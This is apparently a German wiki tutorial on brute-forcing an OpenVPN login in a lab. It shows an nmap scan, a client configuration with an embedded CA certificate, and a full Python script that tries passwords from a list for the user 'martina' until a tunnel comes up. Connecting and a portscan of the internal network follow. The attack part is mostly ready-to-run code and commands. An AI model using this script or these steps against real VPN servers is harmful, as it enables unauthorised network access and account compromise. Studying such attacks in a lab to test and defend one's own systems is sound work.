Openvpn Bruteforce Attacke
Zur Navigation springen
Zur Suche springen
Rechner Scannen
- sudo nmap -sU 192.168.15.89 -p 1194
Starting Nmap 7.95SVN ( https://nmap.org ) at 2025-08-08 13:31 CEST Nmap scan report for 192.168.15.89 Host is up (0.0010s latency). PORT STATE SERVICE 1194/udp open openvpn MAC Address: 08:00:27:E2:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
Wenn wir das CA-Cert haben?
Erstellen einer client.ovpn
- vi client.ovpn
dev tun0 remote 192.168.15.89 tls-client cipher AES-256-CBC link-mtu 1542 mssfix 1450 pull verb 3 auth-user-pass <ca> -----BEGIN CERTIFICATE----- MIIFAzCCAuugAwIBAgIUQ072ZO1klbIh3U2cUIAhFPaeveIwDQYJKoZIhvcNAQEL BQAwETEPMA0GA1UEAwwGY2EuY3J0MB4XDTI1MDgwODEwMDgxN1oXDTM1MDgwNjEw MDgxN1owETEPMA0GA1UEAwwGY2EuY3J0MIICIjANBgkqhkiG9w0BAQEFAAOCAg8A MIICCgKCAgEAvf4Jcrct+66j/iv4rsv+byEF1fyyWf7c8l5XPQYOFrY7t3DwrZWQ b0TJh30ye1S1DjelWMzH6yiiLR22q5+ynFQLLsktzO7qeN/4NentFnVZ2Dl1mwAl a6yHfQ0NM3tBLvRCRenS4RUjN5Ul2V5bYlDTduayxOe/IPq0CUUb0vIedBBiOQ/X egGImWT4ywQCnshA6IxUvLkdjPrfgw1CtT02UaGWACQl4MgGWmnKBiNkaOXHjELc EdcgXMudjTre5SIweWq1akUoo4ZB2Oxje5hyflcmKyO/1SD3Jdx1F4f7vD3Yzh9n MqCSHT8u3bVSWyib7dlDaWK2NE36OB3N3k4YESrwRzStSCeqs6FEZ/b2g0uUCu0q rnaThFWGhPQHlpqrk/SRczcSmsINvtx1sPjao6GwrhrgSkvmj511fLy6m8HKqYkK 5kF1XJ3MkD7jwFCgLD8+jQFccFavYZClz61921FFxqXIUhKuohcGEhXP11h9fRJG ps2F7SuLKPD76UOr28AG2ZSHv9vJMwYdCudQ6rg1/fed0YfBPy8+du0NCY376g5h qwVDqVILWR2jdsqy7lEKQ7eX21a1AJfOyuio4qYxs49FZkxqWeWM/9+kMi6xRDZf 3gg+qVJa4Ea4u3nRJjJRwmF0/b3Lmt/NZLIRR4P/saJfMjLB+3x5sYkCAwEAAaNT MFEwHQYDVR0OBBYEFP91bPonukY6vGZMtTW68kcY9RMfMB8GA1UdIwQYMBaAFP91 bPonukY6vGZMtTW68kcY9RMfMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL BQADggIBAFKSR57WL7gSHmpg7hpxgXRj2mhMs/RO4rRVl5dhrF++PTFKviJSPvkm YqkdN1fgOoNfIUUB7gz1fGpy02ZqmXJhiB1oBZgfwgByJji/+lGckTY2xqiLPiF/ AGsrd9sc42UuLiJeRjAwJeDqaGkX1XMbIqj0hk1ObLTAJubOpJyVeCIcLzByT1GP QYJpOtZTIcjz/gE9Rs4CgCxrFqC2JHBDqoS6y31xVqq0/btCEYIJKoAkrdyOvs56 1dt1mUeF2vokm0//yK3Y0DMnL1wIppfp6Fyiwm4iQkMyGW/nSN+m7he7clv2fRAo 9yHtcuDn2Vu419QyNzoeM0BvrZ85+mQM1fZ3iEBd938nI20bM0SxHjpCLdKHMhOt 16yGDZcdaAysbXNY7y1tFhAApAldtUyGqvBaNO+t9/UVVYvjRnmeGW2Trn9I2e2r +rbF3SLWkEIeg2Oi1Qd9lzPceOFM7mKcEHtn0eHBhPDt04xYDNX4oFW2VTwOlIdq 9pk3/NXt621W9bpVYkwH9jm8/2mKjzYlMo3hY9jw3df8M8xgSUmo2K198PrPvRnj bfCmi0hoSlDehg76asiX6d+9u/MCu8g0vhWL11lAz8MdqOmBUbos7PFnqMyOs+1u XA3HTJ4T0iayTxjfySXOnsm04Za/j599YMSpRysyWOy48e3SIop9 -----END CERTIFICATE----- </ca>
Die Brute Force Python Datei
- vi brute-force.py
import subprocess
user = "martina"
passlist = "bad-passwords"
config = "client.ovpn"
credfile = "vpn-cred.txt"
with open(passlist, "r") as f:
for pw in f:
pw = pw.strip()
print(f"[+] Teste: {user}:{pw}")
# Schreibe Login-Datei
with open(credfile, "w") as cred:
cred.write(f"{user}\n{pw}\n")
try:
result = subprocess.run(
["sudo", "openvpn", "--config", config, "--auth-user-pass", credfile, "--connect-retry-max", "1", "--connect-timeout", "5"],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=15
)
output = result.stdout.decode(errors="ignore")
# Erfolgsmeldung: Tunnel aufgebaut
if "Initialization Sequence Completed" in output:
print(f"[✔] SUCCESS: {user}:{pw}")
break
elif "AUTH_FAILED" in output:
print("[-] Falsches Passwort")
elif "TLS Error" in output:
print("[!] TLS Error – Verbindung fehlgeschlagen")
else:
print("[?] Unerwartetes Verhalten – Ausgabe folgt:")
print(output)
except subprocess.TimeoutExpired:
# Server schweigt = möglicherweise Erfolg
print(f"[✔] SUCCESS (Timeout statt Auth-Fail): {user}:{pw}")
break
Wir ziehen eine Password Liste
Attacke
- sudo python3 brute-force.py
- Man sieht wenn das Password richtig
SUCCESS (Timeout statt Auth-Fail):
VPN herstellen
- sudo openvpn --config client.ovpn
Kenndaten eingeben
Wenn das erscheint sind wir drin
- Initialization Sequence Completed
2. Terminal auf
Welches Netz wurde gepushed?
- ip r s | grep tun0
172.20.200.0/24 dev tun0 proto kernel scope link src 172.20.200.2 172.24.24.0/24 via 172.20.200.1 dev tun0
Portscan
- nmap -sS 172.24.24.0/24